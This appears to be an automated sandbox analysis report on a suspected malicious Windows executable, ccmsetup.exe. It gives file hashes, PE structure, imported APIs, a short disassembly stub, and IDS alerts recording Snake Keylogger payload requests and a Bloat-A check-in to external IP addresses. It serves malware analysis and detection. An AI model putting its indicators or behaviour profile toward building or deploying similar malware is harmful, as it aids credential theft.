                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:MS Windows registry file, NT/2000 or above
                                                                                        Category:dropped
                                                                                        Size (bytes):1835008
                                                                                        Entropy (8bit):4.421746738941615
                                                                                        Encrypted:false
                                                                                        SSDEEP:6144:QSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnNT0uhiTw:7vloTMW+EZMM6DFyp03w
                                                                                        MD5:EDD45342B59CEDA59EA59B7851B22589
                                                                                        SHA1:0355917DB8BFA8F06D99E87230778D62567CA030
                                                                                        SHA-256:CD2A1842941EA248A5AFB8EA34E38A75A950ED8DC39C4C22E0680CC9D7BA3322
                                                                                        SHA-512:CCB329010AA0BF6F7F9C6F1CAF83CB0BE5976AEF4339BCE196BD4A221AA7C2E6C55846CBD4930D02929C61B2ED60083BCCCB9EA86F8FAD17D20C6EAE64F9ECD3
                                                                                        Malicious:false
                                                                                        Process:C:\Users\user\Desktop\._cache_ccmsetup.exe
                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):10245
                                                                                        Entropy (8bit):5.330050068135235
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:XyyJdgVSdL2ML28kO9cAXycEnLHaHHPC/yCPMQtB01Gkv6BCHyPyHArr+VicqRBz:B3+6nP7gNtKWuL8dJrD
                                                                                        MD5:C4708ACF08FF3B2B7B52C91F03214115
                                                                                        SHA1:A297BD6944E13ADDC0132F76C464918E30369F00
                                                                                        SHA-256:AD8F4852729902E2590BB6B12BD76175E5CD20720750C2A9F92B91168B956D4A
                                                                                        SHA-512:4706DE8CFFDBA08530E40C56A7A98F9B646BD5EB89AB95F55D037A15C0EA121E72E28CB1225167C221F388267F981627F17CA8FCCB39088801A66C955F10416B
                                                                                        Malicious:false
                                                                                        Preview:.<![LOG[==========[ ccmsetup started in process 3128 ]==========]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="ccmsetup.cpp:10478">..<![LOG[Running on platform X64]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="util.cpp:1704">..<![LOG[Launch from folder C:\Users\user\Desktop\]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="ccmsetup.cpp:688">..<![LOG[CcmSetup version: 5.0.8790.1025]LOG]!><time="16:49:57.805+300" date="12-05-2024" component="ccmsetup" context="" type="1" thread="1560" file="ccmsetup.cpp:694">..<![LOG[Folder 'Microsoft\Microsoft\Configuration Manager' not found. Task does not exist.]LOG]!><time="16:49:57.821+300" date="12-05-2024" component="ccmsetup" context="" type="0" thread="1560" file="wintask.cpp:709">..<![LOG[Folder 'Microsoft\Microsoft\Configuration Manager' not found. Task
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):5.56388575934556
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 93.58%
                                                                                        • Win32 Executable Borland Delphi 7 (665061/41) 6.22%
                                                                                        • Win32 Executable Delphi generic (14689/80) 0.14%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        File name:ccmsetup.exe
                                                                                        File size:4'873'728 bytes
                                                                                        MD5:823444545911fd17e953437b7c712f2f
                                                                                        SHA1:6d1c0b1c3caade86c13196a0763538d0ee29322e
                                                                                        SHA256:845b6f57d33b26dd409ae897707e4a5141991df780983593965983d95c06c67d
                                                                                        SHA512:51692b5d995081627364345ff73d2f16c573a1cdbccf6130e0ee76417decdf2b57bf09d8c242c709642e9c40d2482e6ccd6ecda99c932b10fac1d8ac44d3367b
                                                                                        SSDEEP:49152:gnsHyjtk2MYC5GDfmrE906DDnrvpjFGO+LFPPYK6Ii1+0UfWUWveO1b9Uqi1dP8B:gnsmtk2aWmrE906DDnjpREFgBIi9/
                                                                                        TLSH:FC366041B6ED6244F7B72EB4ADFEA1520D7FB9A1AC74C71E8110894E2432E55CCB4F22
                                                                                        Icon Hash:08286c76665c1808
                                                                                        Entrypoint:0x49ab80
                                                                                        Entrypoint Section:CODE
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                        DLL Characteristics:
                                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:332f7ce65ead0adfb3d35147033aabe9
                                                                                        Instruction
                                                                                        push ebp
                                                                                        mov ebp, esp
                                                                                        add esp, FFFFFFF0h
                                                                                        mov eax, 0049A778h
                                                                                        call 00007F96F0ACB68Dh
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F96F0B1EFD5h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, 0049ABE0h
                                                                                        call 00007F96F0B1EBD4h
                                                                                        mov ecx, dword ptr [0049DBDCh]
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        mov edx, dword ptr [00496590h]
                                                                                        call 00007F96F0B1EFC4h
                                                                                        mov eax, dword ptr [0049DBCCh]
                                                                                        mov eax, dword ptr [eax]
                                                                                        call 00007F96F0B1F038h
                                                                                        call 00007F96F0AC916Bh
                                                                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa0000 | 0x2a42 | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb0000 | 0x3fb560 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa5000 | 0xa980 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0xa4018 | 0x21 | .rdata |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0xa4000 | 0x18 | .rdata |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| CODE | 0x1000 | 0x99bec | 0x99c00 | 33fbe30e8a64654287edd1bf05ae7c8c | False | 0.5141641260162602 | data | 6.572957870355296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| DATA | 0x9b000 | 0x2e54 | 0x3000 | 1f5e19e7d20c1d128443d738ac7bc610 | False | 0.453125 | data | 4.854620797809023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| BSS | 0x9e000 | 0x11e5 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .idata | 0xa0000 | 0x2a42 | 0x2c00 | 21ff53180b390dc06e3a1adf0e57a073 | False | 0.3537819602272727 | data | 4.919333216027082 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .tls | 0xa3000 | 0x10 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rdata | 0xa4000 | 0x39 | 0x200 | a92cf494c617731a527994013429ad97 | False | 0.119140625 | MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J" | 0.7846201577093705 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| .reloc | 0xa5000 | 0xa980 | 0xaa00 | dcd1b1c3f3d28d444920211170d1e8e6 | False | 0.5899816176470588 | data | 6.674124985579511 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| .rsrc | 0xb0000 | 0x3fb560 | 0x3fb600 | ca371d571491289142606cd71283d285 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0xb0dc8 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | | | 0.38636363636363635 |
| RT_CURSOR | 0xb0efc | 0x134 | data | | | 0.4642857142857143 |
| RT_CURSOR | 0xb1030 | 0x134 | data | | | 0.4805194805194805 |
| RT_CURSOR | 0xb1164 | 0x134 | data | | | 0.38311688311688313 |
| RT_CURSOR | 0xb1298 | 0x134 | data | | | 0.36038961038961037 |
| RT_CURSOR | 0xb13cc | 0x134 | data | | | 0.4090909090909091 |
| RT_CURSOR | 0xb1500 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | | | 0.4967532467532468 |
| RT_BITMAP | 0xb1634 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0xb1804 | 0x1e4 | Device independent bitmap graphic, 36 x 19 x 4, image size 380 | | | 0.46487603305785125 |
| RT_BITMAP | 0xb19e8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.43103448275862066 |
| RT_BITMAP | 0xb1bb8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39870689655172414 |
| RT_BITMAP | 0xb1d88 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.4245689655172414 |
| RT_BITMAP | 0xb1f58 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5021551724137931 |
| RT_BITMAP | 0xb2128 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5064655172413793 |
| RT_BITMAP | 0xb22f8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0xb24c8 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.5344827586206896 |
| RT_BITMAP | 0xb2698 | 0x1d0 | Device independent bitmap graphic, 36 x 18 x 4, image size 360 | | | 0.39655172413793105 |
| RT_BITMAP | 0xb2868 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | | | 0.4870689655172414 |
| RT_ICON | 0xb2950 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.7431988742964353 |
| RT_ICON | 0xb39f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 8192 | Turkish | Turkey | 0.2101313320825516 |
| RT_DIALOG | 0xb4aa0 | 0x52 | data | | | 0.7682926829268293 |
| RT_STRING | 0xb4af4 | 0x358 | data | | | 0.3796728971962617 |
| RT_STRING | 0xb4e4c | 0x428 | data | | | 0.37406015037593987 |
| RT_STRING | 0xb5274 | 0x3a4 | data | | | 0.40879828326180256 |
| RT_STRING | 0xb5618 | 0x3bc | data | | | 0.33472803347280333 |
| RT_STRING | 0xb59d4 | 0x2d4 | data | | | 0.4654696132596685 |
| RT_STRING | 0xb5ca8 | 0x334 | data | | | 0.42804878048780487 |
| RT_STRING | 0xb5fdc | 0x42c | data | | | 0.42602996254681647 |
| RT_STRING | 0xb6408 | 0x1f0 | data | | | 0.4213709677419355 |
| RT_STRING | 0xb65f8 | 0x1c0 | data | | | 0.44419642857142855 |
| RT_STRING | 0xb67b8 | 0xdc | data | | | 0.6 |
| RT_STRING | 0xb6894 | 0x320 | data | | | 0.45125 |
| RT_STRING | 0xb6bb4 | 0xd8 | data | | | 0.5879629629629629 |
| RT_STRING | 0xb6c8c | 0x118 | data | | | 0.5678571428571428 |
| RT_STRING | 0xb6da4 | 0x268 | data | | | 0.4707792207792208 |
| RT_STRING | 0xb700c | 0x3f8 | data | | | 0.37598425196850394 |
| RT_STRING | 0xb7404 | 0x378 | data | | | 0.41103603603603606 |
| RT_STRING | 0xb777c | 0x380 | data | | | 0.35379464285714285 |
| RT_STRING | 0xb7afc | 0x374 | data | | | 0.4061085972850679 |
| RT_STRING | 0xb7e70 | 0xe0 | data | | | 0.5535714285714286 |
| RT_STRING | 0xb7f50 | 0xbc | data | | | 0.526595744680851 |
| RT_STRING | 0xb800c | 0x368 | data | | | 0.40940366972477066 |
| RT_STRING | 0xb8374 | 0x3fc | data | | | 0.34901960784313724 |
| RT_STRING | 0xb8770 | 0x2fc | data | | | 0.36649214659685864 |
| RT_STRING | 0xb8a6c | 0x354 | data | | | 0.31572769953051644 |
| RT_RCDATA | 0xb8dc0 | 0x44 | data | | | 0.8676470588235294 |
| RT_RCDATA | 0xb8e04 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0xb8e14 | 0x3e9830 | PE32 executable (GUI) Intel 80386, for MS Windows | | | 0.5238924026489258 |
| RT_RCDATA | 0x4a2644 | 0x3 | ASCII text, with no line terminators | Turkish | Turkey | 3.6666666666666665 |
| RT_RCDATA | 0x4a2648 | 0x3c00 | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows | Turkish | Turkey | 0.54296875 |
| RT_RCDATA | 0x4a6248 | 0x64c | data | | | 0.5998759305210918 |
| RT_RCDATA | 0x4a6894 | 0x153 | Delphi compiled form 'TFormVir' | | | 0.7522123893805309 |
| RT_RCDATA | 0x4a69e8 | 0x47d3 | Microsoft Excel 2007+ | Turkish | Turkey | 0.8675150921846957 |
| RT_GROUP_CURSOR | 0x4ab1bc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x4ab1d0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.25 |
| RT_GROUP_CURSOR | 0x4ab1e4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x4ab1f8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x4ab20c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x4ab220 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_CURSOR | 0x4ab234 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | | | 1.3 |
| RT_GROUP_ICON | 0x4ab248 | 0x14 | data | Turkish | Turkey | 1.1 |
| RT_VERSION | 0x4ab25c | 0x304 | data | Turkish | Turkey | 0.42875647668393785 |
                                                                                        DLLImport
                                                                                        kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCurrentDirectoryA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, ExitThread, CreateThread, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                        user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                        advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                        oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                        kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                        advapi32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegNotifyChangeKeyValue, RegFlushKey, RegDeleteValueA, RegCreateKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA, GetUserNameA, AdjustTokenPrivileges
                                                                                        kernel32.dlllstrcpyA, WritePrivateProfileStringA, WriteFile, WaitForSingleObject, WaitForMultipleObjects, VirtualQuery, VirtualAlloc, UpdateResourceA, UnmapViewOfFile, TerminateProcess, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetFileAttributesA, SetEvent, SetErrorMode, SetEndOfFile, ResumeThread, ResetEvent, RemoveDirectoryA, ReadFile, OpenProcess, OpenMutexA, MultiByteToWideChar, MulDiv, MoveFileA, MapViewOfFile, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTimeZoneInformation, GetTickCount, GetThreadLocale, GetTempPathA, GetTempFileNameA, GetSystemInfo, GetSystemDirectoryA, GetStringTypeExA, GetStdHandle, GetProcAddress, GetPrivateProfileStringA, GetModuleHandleA, GetModuleFileNameA, GetLogicalDrives, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeThread, GetDriveTypeA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedIncrement, InterlockedExchange, InterlockedDecrement, FreeLibrary, FormatMessageA, FindResourceA, FindNextFileA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, EnumCalendarInfoA, EnterCriticalSection, EndUpdateResourceA, DeleteFileA, DeleteCriticalSection, CreateThread, CreateProcessA, CreatePipe, CreateMutexA, CreateFileMappingA, CreateFileA, CreateEventA, CreateDirectoryA, CopyFileA, CompareStringA, CloseHandle, BeginUpdateResourceA
                                                                                        version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                        gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, BitBlt
user32.dll: CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, ToAsciiEx, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyExA, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextLengthA, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
ole32.dll: CLSIDFromString
kernel32.dll: Sleep
oleaut32.dll: SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
ole32.dll: CLSIDFromProgID, CoCreateInstance, CoUninitialize, CoInitialize
oleaut32.dll: GetErrorInfo, SysFreeString
comctl32.dll: ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
shell32.dll: ShellExecuteExA, ExtractIconExW
wininet.dll: InternetGetConnectedState, InternetReadFile, InternetOpenUrlA, InternetOpenA, InternetCloseHandle
shell32.dll: SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetMalloc, SHGetDesktopFolder
advapi32.dll: OpenSCManagerA, CloseServiceHandle
wsock32.dll: WSACleanup, WSAStartup, gethostname, gethostbyname, inet_ntoa
netapi32.dll: Netbios
Language of compilation system | Country where language is spoken | Map
Turkish | Turkey |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-05T22:50:09.931417+0100 | 2832617 | ETPRO MALWARE W32.Bloat-A Checkin | 1 | 192.168.2.5 | 49712 | 69.42.215.252 | 80 | TCP
2024-12-05T22:50:10.040926+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49707 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:10.058361+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49708 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:13.916914+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49721 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:13.917017+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49720 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:16.524228+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49728 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:16.539757+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49729 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:20.512345+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49747 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:20.514577+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49746 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:23.147931+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49756 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:23.193532+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49757 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:26.263261+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49771 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:26.453865+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49772 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:30.249703+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49794 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:30.266871+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49793 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:32.858878+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49804 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:33.049361+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49802 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:35.943042+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49825 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:36.148062+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49824 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:39.949573+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49844 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:39.964544+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49845 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:43.954881+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49864 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:43.958340+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49863 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:47.969861+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49882 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:47.979997+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49883 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:50.565071+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49892 | 172.217.19.238 | 443 | TCP
2024-12-05T22:50:50.766342+0100 | 2044887 | ET MALWARE Snake Keylogger Payload Request (GET) | 1 | 192.168.2.5 | 49894 | 172.217.19.238 | 443 | TCP
